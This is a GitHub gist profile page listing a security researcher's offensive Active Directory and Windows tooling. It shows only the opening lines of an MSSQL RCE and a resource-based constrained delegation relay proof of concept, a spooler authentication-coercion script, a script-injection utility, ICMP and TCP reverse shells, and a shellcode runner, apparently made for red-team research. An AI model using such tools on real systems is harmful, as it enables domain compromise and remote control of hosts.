Skip to content

Instantly share code, notes, and snippets.

Matt Bush 3xocyte

  • The Missing Link
  • Melbourne, Australia
View GitHub Profile
@3xocyte
3xocyte / adidns_records.py
Last active Nov 12, 2019
get /etc/hosts entries from ADIDNS
View adidns_records.py
#!/usr/bin/env python
import argparse
import sys
import binascii
import socket
import re
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE, ALL_ATTRIBUTES
# get /etc/hosts entries for domain-joined computers from A and AAAA records (via LDAP/ADIDNS) (@3xocyte)
@3xocyte
3xocyte / bad_sequel.py
Last active Mar 6, 2020
PoC MSSQL RCE exploit using Resource-Based Constrained Delegation
View bad_sequel.py
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a rough PoC
# requirements for RCE:
# - the attacker needs to either have or create an object with a service principal name
# - the MSSQL server has to be running under the context of System/Network Service/a virtual account
# - the MSSQL server has the WebClient service installed and running (not default on Windows Server hosts)
# - NTLM has to be in use
@3xocyte
3xocyte / rbcd_relay.py
Last active Jun 30, 2020
poc resource-based constrain delegation relay attack tool
View rbcd_relay.py
#!/usr/bin/env python
# for more info: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
# this is a *very* rough PoC
import SimpleHTTPServer
import SocketServer
import base64
import random
import struct
@3xocyte
3xocyte / resolve_domain_computers.py
Last active Oct 15, 2019
get /etc/hosts entries for computers in Active Directory
View resolve_domain_computers.py
#!/usr/bin/env python
# resolve domain computers by @3xocyte
import argparse
import sys
import string
# requires dnspython and ldap3
import dns.resolver
from ldap3 import Server, Connection, NTLM, ALL, SUBTREE
@3xocyte
3xocyte / create_machine_account.py
Last active Nov 22, 2019
simple script for experimenting with machine account creation
View create_machine_account.py
#!/usr/bin/env python
import argparse
import sys
import string
import random
# https://support.microsoft.com/en-au/help/243327/default-limit-to-number-of-workstations-a-user-can-join-to-the-domain
# create machine account utility by @3xocyte
# with thanks to Kevin Robertson for https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
@3xocyte
3xocyte / dementor.py
Last active Jun 16, 2020
rough PoC to connect to spoolss to elicit machine account authentication
View dementor.py
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@3xocyte
3xocyte / scriptinjector.cs
Last active Oct 6, 2018
a small buggy utility inspired by chapter 10 of Black Hat Python by Justin Seitz
View scriptinjector.cs
using System;
using System.IO;
using System.Text;
using System.Linq;
using System.Collections.Generic;
// ephemeral script injector by @3xocyte
// takes a target directory to watch, and an OS command to attempt to inject into any scripts that get modified
namespace FileContentInjector
@3xocyte
3xocyte / icmpshell.cs
Created Aug 13, 2018
ICMP reverse shell (icmpsh compatible)
View icmpshell.cs
using System;
using System.IO;
using System.Text;
using System.Net.NetworkInformation;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Threading;
using System.Collections.ObjectModel;
// .NET ICMP reverse shell client with PowerShell runspace by @3xocyte
@3xocyte
3xocyte / tcpshell.cs
Last active Aug 13, 2018
Reverse TCP shell with PS runspace
View tcpshell.cs
using System;
using System.Text;
using System.Net.Sockets;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Collections.ObjectModel;
using System.Diagnostics;
// reverse TCP shell with powershell runspace
// by @3xocyte
@3xocyte
3xocyte / sc-cdb.py
Last active Sep 3, 2019
shellcode to cbd.exe
View sc-cdb.py
#!/usr/bin/env python
# run: cdb.exe -cf output.wds -o calc.exe
# From: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
src = open('shellcode', 'r')
sc = src.read()
src.close
copy = ";eb @$t0+"
You can’t perform that action at this time.